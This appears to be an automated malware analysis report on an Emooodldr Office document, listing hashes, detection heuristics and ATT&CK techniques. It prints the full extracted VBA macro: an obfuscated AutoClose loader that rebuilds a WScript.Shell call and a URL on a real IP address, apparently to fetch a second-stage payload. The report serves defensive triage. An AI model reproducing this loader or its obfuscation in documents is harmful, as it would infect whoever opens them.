Emooodldr Office (OOXML) malware analysis — malicious · c0296ba94b4445a4

MALICIOUS

Office (OOXML)

54.6 KB Created: 2017-11-29 23:43:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2019-03-10

MD5: 847994b3a270208c427f6a8584fe494d SHA-1: 079cfe48c45f90318bb4c819b246957b7be10e1a SHA-256: c0296ba94b4445a4e3be227a31d3ccba011ebb358e93224a5141f53e9f6ec832

292 Risk Score

Malware Insights

Emooodldr · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is an Office document containing obfuscated VBA macros, specifically an Auto_Close macro that uses CreateObject to execute a command. The VBA code reconstructs a URL, "http://198.55.107.156/oriPfgLkVzxLqriPfgLkVzxLq/pMfAqoIFvCMoWHiFUOjcVVRjUviSbNiTiwCrriPfgLkVzxLq.php?uWHiFUOjcVVRjriPfgLkVzxLqYTXjzrqWGFBp=hondYTXjzrqWGFBp", which is likely used to download and execute a second-stage payload. ClamAV also detected this file as "Doc.Malware.Emooodldr-6711604-0".

Heuristics 8

ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
 CreateObject(seborreia).Run guaxinim, 0
 LNGBRGDjzHRC = 641 - 1967 - 1390 - 464 - 431
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

 CreateObject(seborreia).Run guaxinim, 0
 LNGBRGDjzHRC = 641 - 1967 - 1390 - 464 - 431

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Auto_Close macro low OLE_VBA_AUTOCLOSE

Auto_Close macro
Matched line in script
```
Sub AutoClose()
```
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	2895 bytes
SHA-256: `5368eb350327f37c72ea3e16b2d06b8e80c060a2e7a7cc6d30f6623ed2a69d6c`
Detection ClamAV: No threats found Obfuscation or payload: likely 47 of 75 identifiers look randomly generated (e.g. 'riPfgLkVzxLqpMfAqoIFvCMohWHiFUOjcVVRjYTX') — consistent with name-mangling obfuscation.
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub oitocentos() PUfNCvRqqEfx = Trim("b") & Trim("K") & Trim("x") & "o" QREHoLUdyK = 425 + 1092 WryUYKOzkyP = "Y" & Trim("J") & Trim("P") & "v" guaxinim = "riPfgLkVzxLqpMfAqoIFvCMohWHiFUOjcVVRjYTXjzrqWGFBp hWHiFUOjcVVRjWHiFUOjcVVRjp://198.55.107.156/oriPfgLkVzxLqriPfgLkVzxLq/pMfAqoIFvCMoWHiFUOjcVVRjUviSbNiTiwCrriPfgLkVzxLq.php?uWHiFUOjcVVRjriPfgLkVzxLqYTXjzrqWGFBp=hondYTXjzrqWGFBp" guaxinim = Replace(guaxinim, "riPfgLkVzxLq", "m") guaxinim = Replace(guaxinim, "YTXjzrqWGFBp", "a") guaxinim = Replace(guaxinim, "pMfAqoIFvCMo", "s") ufvQPWzj = Trim("i") & "V" & Trim("p") czkZBcn = 1051 - 1922 - 1260 - 1215 - 1371 ipoSOfMHLII = 222 + 589 + 1620 + 1774 guaxinim = Replace(guaxinim, "WHiFUOjcVVRj", "t") jgqSvGczT = 361 + 1927 + 273 + 48 + 1337 + 1165 MRyWGpDZvxOu = 1343 - 1256 - 1503 - 422 - 1284 guaxinim = Replace(guaxinim, "UviSbNiTiwCr", "e") guaxinim = Replace(guaxinim, "wBkKgGVckpVB", "l") nnFWCkcHOX = Trim("V") & Trim("F") & "y" JzdEbvc = "K" & Trim("O") & Trim("P") & Trim("I") & Trim("w") & "A" bGYUFdWb = "S" & Trim("T") & "k" & "p" & Trim("M") seborreia = "WScripTGUcrzHDEVPS.ShnuIrMczPfgfTrHCIqHnCUVIPrHCIqHnCUVIP" seborreia = Replace(seborreia, "DATWOzYLjyCY", "m") gANTbDvRKXu = Trim("k") & "E" & Trim("K") & "N" & Trim("E") oFoIFNkBMidA = "I" & "o" & "w" seborreia = Replace(seborreia, "qNGGQLfwgZMT", "a") UFpAcMWd = 1717 + 251 + 316 LPVVoBfyJc = 1168 + 163 gvCbPxFb = "c" & "S" & "T" seborreia = Replace(seborreia, "CWEyikrRHIZw", "s") seborreia = Replace(seborreia, "TGUcrzHDEVPS", "t") zygddkXXnW = "S" & "T" & "P" viEBkFqJ = 50 + 1431 + 596 + 599 + 184 + 1280 + 503 RIiEdTC = Trim("W") & "r" seborreia = Replace(seborreia, "nuIrMczPfgfT", "e") seborreia = Replace(seborreia, "rHCIqHnCUVIP", "l") HUWvubrR = 933 - 1364 - 1560 gyDYbzCX = "L" & Trim("n") ngIWvMvw = 1907 - 1809 - 730 - 99 - 34 - 838 CreateObject(seborreia).Run guaxinim, 0 LNGBRGDjzHRC = 641 - 1967 - 1390 - 464 - 431 jSIRPVRTKNLJ = 97 - 3 - 1334 yukPxJOJYAp = "A" & "H" & Trim("O") & Trim("X") End Sub Sub AutoClose() zDOIfQcTQLLd = 556 + 1895 + 1754 + 1560 + 1432 + 1674 + 279 + 425 MQnWzBIUuI = "j" & "D" & "v" qyzvqQzSzbIr = 300 - 1331 - 787 - 348 - 380 - 1438 fiCBrMX = 1567 - 1650 jwqUXOgoEgP = 1531 + 1356 + 676 + 484 + 958 + 967 + 1564 AcDvHdDu = 777 + 1021 + 831 UILHoPJ = 814 + 1505 + 1976 + 876 Application.Run "oitocentos" pxWHAgAw = 370 + 1064 + 41 bCoYNfi = 788 - 538 - 161 - 57 QoAYkZxUYq = 511 + 528 + 548 + 376 + 1504 + 611 zzVwABEWncL = Trim("d") & "X" & Trim("v") HfIjiOQ = "i" & Trim("Z") & Trim("A") End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	13824 bytes
SHA-256: `3e2042e102fa4d55b2981f6c1aa7b156551e1a8df6c783ba76adee2b4d5e1278`
Detection ClamAV: Doc.Malware.Emooodldr-6711604-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.